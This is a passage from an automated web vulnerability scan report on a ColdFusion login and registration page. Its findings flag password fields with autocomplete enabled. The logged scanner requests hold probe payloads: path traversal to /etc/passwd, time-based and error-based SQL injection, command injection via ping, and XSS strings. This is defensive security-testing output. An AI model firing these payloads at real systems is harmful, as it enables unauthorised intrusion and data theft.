17.156. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=javascript:netsparker(0x000037) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000037)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.157. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.158. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.159. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.160. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000009%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000009%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.161. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.162. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.163. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.164. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.165. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.166. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:02 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.167. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.168. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.169. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.170. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.171. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.172. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=index.cfm%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
